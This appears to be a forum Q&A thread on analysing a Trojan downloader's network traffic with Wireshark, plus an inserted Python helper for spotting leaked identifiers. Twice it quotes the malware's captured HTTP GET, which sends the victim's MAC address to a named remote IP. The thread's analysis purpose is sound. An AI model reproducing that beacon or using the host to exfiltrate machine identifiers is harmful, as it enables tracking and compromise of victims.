Hello, I examined a Trojan downloader and I found that it sends the local MAC address to a remote computer. Can you please help me to understand the process using Wireshark? BTW I use IDA Pro.

asked 03 Feb '13, 12:26

Mimou Fares

Have you captured the traffic of the computer that has the trojan? That would be the first step - and please, don't do it ON the infected computer. Forensic captures are best taken by using a network TAP and another computer running a capture software like Wireshark/dumpcap. If you don't have a TAP you can try capturing via SPAN port.

When you have a trace you could post it at www.cloudshark.org and post the URL. That way we can take a look at what you've got.

answered 03 Feb '13, 14:49

Jasper ♦♦
Thank you for your answer. To capture the traffic I used Wireshark within the infected machine (virtual) and INetSim in the host. I had the following HTTP query:

    GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1
    User-Agent: wget 3.0
    Host: 64.247.39.247
    Cache-Control: no-cache

(03 Feb '13, 15:15) Mimou Fares

It seems also that the Trojan sends the user name! Where can I find such relevant information? Thank you.

(03 Feb '13, 15:21) Mimou Fares

Well, basically you'll have to look through the trace you have and try to find any data transmitted that shouldn't be. POST or GET requests usually carry form data and parameters, so you should look at these. GET parameters are found in the URL, while POST parameters can be found at the bottom (line-based text data).

(03 Feb '13, 17:04) Jasper ♦♦
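As an added illustration of the advice above (example code, not from the thread or from Wireshark): a small Python helper that pulls GET parameters out of the URL and POST parameters out of a form-encoded body, then flags values that look like a MAC address or carry identifier-like names such as `mac`, `user` or `host`. The sample requests are constructed, modelled on the GET shown in the thread with a made-up MAC.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests (not from a real capture); the first mirrors
# the GET from the thread, with a made-up MAC address in place of the real one.
SAMPLE_REQUESTS = [
    "GET /confirm.php?aid=0&said=0&mac=00:11:22:33:44:55&mn=1489 HTTP/1.1\r\n"
    "User-Agent: wget 3.0\r\nHost: 64.247.39.247\r\nCache-Control: no-cache\r\n\r\n",
    "POST /report.php HTTP/1.1\r\nHost: 64.247.39.247\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=alice&host=WORKSTATION-7&id=42",
    "GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n",
]

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")
# Parameter names that commonly carry host or user identifiers (assumed list).
SUSPICIOUS_KEYS = {"mac", "user", "username", "host", "hostname", "computer"}

def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def extract_params(raw):
    """Return (method, host, params): GET params from the URL, POST params from the body."""
    method, target, headers, body = parse_http_request(raw)
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body, keep_blank_values=True)
    return method, headers.get("host", ""), params

def flag_leaks(raw):
    """List (key, value, reason) for parameters that look like host identifiers."""
    _, _, params = extract_params(raw)
    findings = []
    for key, value in params:
        if MAC_RE.match(value):
            findings.append((key, value, "MAC address"))
        elif key.lower() in SUSPICIOUS_KEYS:
            findings.append((key, value, "identifier-like parameter name"))
    return findings

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        method, host, _ = extract_params(req)
        print(method, host, flag_leaks(req))
```

The same logic applies to text exported from Wireshark (File > Export Packet Dissections, or Follow TCP Stream), one request at a time.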

    GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1
    User-Agent: wget 3.0
    Host: 64.247.39.247
    Cache-Control: no-cache

Yes, looks like a Trojan, at least SonicWall and McAfee say so (same IP address used: 64.247.39.247):

http://software.sonicwall.com/applications/gav/index.asp?ev=v&v_id=26287
http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=148862 (see Characteristics)

Regards
Kurt

answered 06 Feb '13, 12:52

Kurt Knochner ♦
edited 06 Feb '13, 12:55

question asked: 03 Feb '13, 12:26

question was seen: 2,491 times

last updated: 06 Feb '13, 12:55